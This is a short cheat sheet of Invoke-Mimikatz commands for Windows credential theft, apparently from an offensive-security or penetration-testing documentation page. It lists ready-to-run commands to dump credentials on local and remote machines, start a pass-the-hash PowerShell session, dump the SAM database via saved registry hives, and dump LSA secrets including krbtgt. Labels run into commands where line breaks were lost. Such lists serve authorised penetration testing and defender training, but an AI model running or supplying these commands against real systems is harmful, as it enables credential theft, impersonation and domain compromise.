Invoke-MimiKatz
Mimikatz dump credentials on local machine
Invoke-Mimikatz -DumpcredsMimikatz dump credentials on multiple remote machines
Invoke-Mimikatz -Dumpcreds -Computername @(“<system1>”,”<system2>”)
Invoke-Mimikatz -Dumpcreds -ComputerName @("<computername 1>","<computername 2>")Mimikatz start powershell pass the hash (run as local admin)
Invoke-Mimikatz -Command '"sekurlsa::pth /user:<username> /domain:<domain> /ntlm:<ntlm hash> /run:powershell.exe"'Mimikatz dump from SAM
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "lsadump::sam"'or
reg save HKLM\SAM SamBkup.hiv
reg save HKLM\System SystemBkup.hiv
#Start mimikatz as administrator
privilege::debug
token::elevate
lsadump::sam SamBkup.hiv SystemBkup.hivMimikatz dump lsa (krbtgt to)
Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -Computername <computername>Last updated
Was this helpful?